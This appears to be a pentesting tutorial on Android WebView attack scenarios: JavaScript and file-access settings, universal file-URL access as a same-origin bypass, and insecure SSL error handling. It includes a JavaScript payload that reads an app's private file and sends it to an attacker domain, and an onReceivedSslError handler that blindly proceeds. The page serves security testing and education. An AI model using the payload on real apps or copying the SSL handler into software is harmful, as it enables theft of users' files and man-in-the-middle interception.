Webview Attacks

Javascript Enabled

WebViews have Javascript disabled by default. The method setJavaScriptEnabled() is available for explicitly enabling or disabling it.

File Access

WebView file access is enabled by default. Since API 3 (Cupcake 1.5) the method setAllowFileAccess() is available for explicitly enabling or disabling it.

If the application has android.permission.READ_EXTERNAL_STORAGE it will be able to read and load files from the external storage.

The WebView needs to use a File URL Scheme, e.g., file://path/file, to access the file.

CORS - Cross Origin Resource Sharing

If you want to learn what is CORS please read this post.

There is a very important property called **UniversalAccessFromFileURLs**_ **that allows SOP bypass**. This property indicates whether Javascript_ running in the context of a file scheme can **access content from any origin**. This property is enabled by default below API 16 (Jelly Bean 4.1.x) and there is no way to disable it on those API levels [1]. In API 16 (Jelly Bean 4.1.x) and afterwards the property is **disabled by default**. The method setAllowUniversalAccessFromFileURLs() ****was also made available to explicitly enable or disable this feature.

Scenarios

Javascript Enabled & FileSystemAccess Disabled

In this scenario an attacker is able to inject Javascript code inside the web page opened via webview by the victim. This could be done maybe via XSS or making the webview load a malicious HTML page stored inside the phone.
This webview has Javascript enabled but no access to the file system.

In this scenario the attacker won’t be able to read local files, but depending on the permissions of the application this could allow an attacker to interact with the functionality of the device (read SMS, microphone recording etc.) exposing the security of the application and the device itself into great risk.

Javascript Enabled & FileSystemAccess enabled

The scenario is like the one mentioned previously but the webview now have FileSystem access.
An attacker could try to ex-filtrate files with javascript code like:

var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
    window.location.replace('https://attackerdomain.com/?exfiltrated='+xhr.responseText);
    }
}
xhr.open('GET', 'file:///data/data/pt.integrity.labs.webview_remote/files/sandbox_file.txt', true);
xhr.send(null);

So even with file access enabled in the WebView, due to the fact that the file scheme request is considered a Cross Origin Request and hence disallowed, the attacker will not be able to exfiltrate files this way.

Note that if the attacker is able to control the mobile where the vulnerable application is running, he could be able to abuse it to make it load the internal file and see it. In this case the CORS isn’t stopping the attack because the attacker is directly accessing the file instead of trying to access it from a different origin.

CORS related errors looks like this:

05-09 12:38:59.306 27768 27768 I chromium: [INFO:CONSOLE(20)] Failed to load file:///data/data/pt.integrity.labs.webview_remote/files/sandbox_file.txt: Cross origin requests are only supported for protocol schemes: http, data, chrome, https.”, source: https://labs.integrity.pt/ (20)

Javascript Enabled, FileSystemAccessEnabled & CORS Disabled

In this scenario, using the same Javascript payload, you will finally be able to ex-filtrate internal files.

SSL Error Handling

The code below instructs the WebView client to proceed when an SSL error occur. This means that the application is vulnerable to MiTM attacks as it could allow an attacker to read or modify content that is displayed to the user since any certificate would be accepted by the application.

@Override
public void onReceivedSslError(WebView view, SslErrorHandler handler,
SslError error)
{
    handler.proceed();
}

References